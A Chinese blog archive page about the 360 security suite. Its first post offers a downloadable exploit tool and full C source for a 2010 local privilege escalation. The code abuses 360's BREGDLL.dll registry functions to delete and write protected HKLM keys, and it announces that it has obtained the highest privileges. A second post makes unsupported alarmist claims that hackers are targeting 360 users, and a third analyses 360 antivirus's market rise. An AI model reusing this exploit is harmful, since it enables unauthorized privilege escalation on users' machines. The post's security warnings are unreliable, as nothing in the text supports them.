存档

文章标签 ‘360’

360本地提权漏洞演示+利用工具 EXP

2010年2月3日 1 条评论

漏洞演示地址已失效

工具下载地址:

下载地址

代码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
#include
typedef BOOL (WINAPI *INIT_REG_ENGINE)();
typedef LONG (WINAPI *BREG_Delete_KEY)(HKEY hKey, LPCSTR lpSubKey);
typedef LONG (WINAPI *BREG_OPEN_KEY)(HKEY hKey, LPCSTR lpSubKey, PHKEY phkResult);
typedef LONG (WINAPI *BREG_CLOSE_KEY)(HKEY hKey);
typedef LONG (WINAPI *REG_SET_VALUE_EX)(HKEY hKey, LPCSTR lpValueName, DWORD Reserved, DWORD dwType, const BYTE* lpData, DWORD cbData);

BREG_Delete_KEY BRegDeleteKey = NULL;
BREG_OPEN_KEY BRegOpenKey = NULL;
BREG_CLOSE_KEY BRegCloseKey = NULL;
REG_SET_VALUE_EX BRegSetValueEx = NULL;

#define AppPath                        "Software\\Microsoft\\Windows\\CurrentVersion\\App Paths\\360safe.exe"

#define TestDeleteKey             HKEY_LOCAL_MACHINE
#define TestDeleteRegPath    "Software\\360Safe\\Update"

#define TestSetKey                   HKEY_LOCAL_MACHINE
#define TestSetPath                  "Software\\360Safe"

BOOL InitBRegDll()
{
LONG lResult;
HKEY hKey;

CHAR cPath[MAX_PATH + 32] = { 0 };
DWORD dwPathLen = MAX_PATH;

lResult = RegOpenKeyA(HKEY_LOCAL_MACHINE, AppPath, &hKey);
if (FAILED(lResult))
return FALSE;

DWORD dwType = REG_SZ;
lResult = RegQueryValueExA(hKey, "Path", NULL, &dwType, (LPBYTE)cPath, &dwPathLen);
RegCloseKey(hKey);
if (FAILED(lResult))
return FALSE;

strcat(cPath, "\\deepscan\\BREGDLL.dll");

HMODULE modBReg = LoadLibraryA(cPath);
if (!modBReg)
return FALSE;

INIT_REG_ENGINE InitRegEngine = (INIT_REG_ENGINE)GetProcAddress(modBReg, "InitRegEngine");
BRegDeleteKey = (BREG_Delete_KEY)GetProcAddress(modBReg, "BRegDeleteKey");
BRegOpenKey = (BREG_OPEN_KEY)GetProcAddress(modBReg, "BRegOpenKey");
BRegCloseKey = (BREG_CLOSE_KEY)GetProcAddress(modBReg, "BRegCloseKey");
BRegSetValueEx = (REG_SET_VALUE_EX)GetProcAddress(modBReg, "BRegSetValueEx");

if (!InitRegEngine || !BRegDeleteKey || !BRegOpenKey || !BRegCloseKey || !BRegSetValueEx) {
FreeLibrary(modBReg);
return FALSE;
}

if (!InitRegEngine()) {
FreeLibrary(modBReg);
return FALSE;
}

return TRUE;
}

LONG TestSetRegKey()
{
HKEY hKey;
LONG lResult;

lResult = BRegOpenKey(TestSetKey, TestSetPath, &hKey);
if (FAILED(lResult))
return lResult;

DWORD dwType = REG_SZ;
static char szData[] = "TEST VALUE";
lResult = BRegSetValueEx(hKey, TestSetPath, NULL, dwType, (const BYTE *)&szData, (DWORD)sizeof(szData));
BRegCloseKey(hKey);

return lResult;
}

int main(int argc, char *argv[])
{
if (!InitBRegDll()) {
MessageBoxA(NULL, "初始化BReg失败!", "失败", MB_ICONSTOP);
return 1;

}
if (FAILED(BRegDeleteKey(TestDeleteKey, TestDeleteRegPath))) {
MessageBoxA(NULL, "键值删除失败!", "失败", MB_ICONSTOP);
return 2;

}

if (FAILED(TestSetRegKey())) {
MessageBoxA(NULL, "设置键值失败!", "失败", MB_ICONSTOP);
return 3;
}

MessageBoxA(NULL, "突破系统安全检查,获得最高权限,漏洞利用成功!", "成功", MB_OK);
return 0;
}
标签:, , , , ,
分类: 电脑网络 标签: , , , , ,

使用360可能导致电脑给入侵

2010年2月3日 没有评论

最近传“”闹的沸沸扬扬,可这不是空穴来风,在某几个黑客已经有人开始卖漏洞的破解方法了。

同时也出现上面比较诙谐的图片

现在已经给黑客关注了,这意味着使用360的用户将会有危险,很多黑客正在扫描装360的机器,寻找入侵的机会。

所以本人告诫大家,有重要信息的,或者登陆银行的电脑,千万不要安装使用360.

标签:, ,
分类: 电脑网络 标签: , ,

360杀毒软件的快速崛起 告诉我们的一些道理

2009年11月23日 3 条评论

这段时间最牛逼的产品之一是360安全卫士旗下刚刚推出的360杀毒,这个“借壳上市”的杀毒软件9月30日发布,到今天不满两个月时间。按照艾瑞的iUserTracker统计,11月2日到11月8日的日均覆盖率已经达到了2680.7万,在所有软件中排第12位,超过了QQ游戏大厅、 Maxthon、PPstream、暴风影音这些广大人民群众耳熟能详的老牌互联网软件,超过360一手捧起来的NOD32和卡巴斯基,跻身杀毒软件第二位,猛烈的摇晃着瑞星的统治地位。

这样的一个推广速度超过了以前任何一个产品的推广,即便是QQ系产品也都经过了多产品矩阵式的关联推广和时间的累积。有了360杀毒,QQ拼音一年6000万覆盖的新闻就已经不再那么令人震惊了。

这个案例告诉们一些道理:

1,关联推广是这个世界上最牛逼的推广方式,口碑传播相比来说只能算是一些奇迹,你得产品做到足够好,有足够多的基础人群,而这往往需要漫长的累积过程。

2,关联推广关键还是产品的关联性。在一个安全产品上推另外一个安全产品,就像用QQ推Qzone、知道推百科、淘宝推商城一样轻松。一个公司除非有太多的钱和人,才做的起不关联的产品。

3,一定要简单。简单涉及到转化率的问题,这跟产品设计上的道理没什么两样。360杀毒把安装自己和卸载竞争对手放在一个向导里边,用户只要下一步下一步就完成了竞争过程,用户过度最自然,360笑而不语。

4,客户端的威力。如果是一个网站,一般要做新产品的推广,你得考虑产品的关联点在哪里,精心设计用户路径,还得靠用户来了点了才能奏效。客户端虽然也需要这样,但真不需要这么麻烦,360弹一天的tips,就是1.13亿的推广量,QQ弹一天的tips,就是1.44亿的推广量,除非害怕服务器爆掉,不得不分批分期执行。这还不包括,360考虑是针对卡巴的用户弹还是针对金山的用户弹的问题。

360推广做得好,不如产品做得好。推广能力强,那是先天优势,产品的牛逼之处则是人开动脑筋想出来的。360产品好的点包括但不限于:

1,免费

免费不是这个世界上最牛的商业模式,但却是最牛的竞争手段。免费可以快速攫取用户,拥有品牌和服务保障的产品转瞬间竞争优势损失过半。免费可以一天一天的毁掉一个十几亿元的行业,同时另外一套商业模式悄然重建。一个昨天还因过于抢手估值不断上升的企业,可以因为一条免费的新闻估值迅速下调而显得烫手。

在瑞星、卡巴、NOD32们看来,杀毒软件病毒库升级、按月付费的商业模式天经地义不可动摇,但在360看来,互联网用户享受杀毒服务为什么一定要收人家钱呢。这样一种服务几乎覆盖每一台电脑,用户规模堪比QQ,不,要超过QQ,程序的系统驻留时间无以伦比的长,粘性无以伦比的大。如果能够被一家垄断,天哪!……这或许就是另一个QQ帝国的梦想,即使实际上两者有如此大的不同。

瑞星同学依然有覆盖最大量的杀毒软件,可惜这次遇到了360,瑞星有强悍的five毛党,可惜这次遇到了周鸿祎。们期待金山,这个互联网时代的软件公司有所动作。

2,外包

在cnbeta上有很多人瞧不起360的实力,他们说360浏览器(日均覆盖量4088.1万,排名第9位,对比马桶的2460.8万)无非是拿人家世界之窗套上绿色的壳,360杀毒拿Bitdefender套上360的壳。

问题是在互联网什么最值钱?用户最值钱,时间最值钱。互联网用户才不管你的代工厂是谁,只要信得过你他就会用,只要你的产品做得体验好他就会用。

在互联网的竞争中,几乎没有什么技术是不可战胜的,不可战胜的永远是用户体验。所谓的核心算法、程序架构、服务器群组其实跟客服坐席没什么两样,都是为了体验两个字。领先者永远需要靠领先优势巩固领先地位,而不是靠技术。

外包可以让360最快速的拥有top级的产品体验,最快速的投入用户市场,让那些慢悠悠的产品去死吧。

3,细节

伟大的创新往往是市场天才的杰作,体验则永远跟细节在一起。

前边提到了安装过程中卸载其他杀毒产品,除此之外还可以看到360杀毒资源占用少,这一直是老百姓对杀毒软件的恨,以至于很多人干脆裸了算了。还有类似杀软共存模式、扫描提示、免打扰模式、开机不启动等等,延续了360一贯高标准的产品作风。

听过老周两次演讲,看过数段老周的访谈,感觉老周是个实在而有想法的人。当年3721也曾红红火火,并入雅虎也曾充满希望,看看现在百度这么强大,google这么无力,QQ这个客户端这么为所欲为,估计老周是有想法的。360安全卫士和360浏览器的巨大成功除了增强团队的信心,还会给团队增加无数的宝贵心得体会,让人们对360的未来充满期待。

标签:, , ,
分类: 电脑网络 标签: , , ,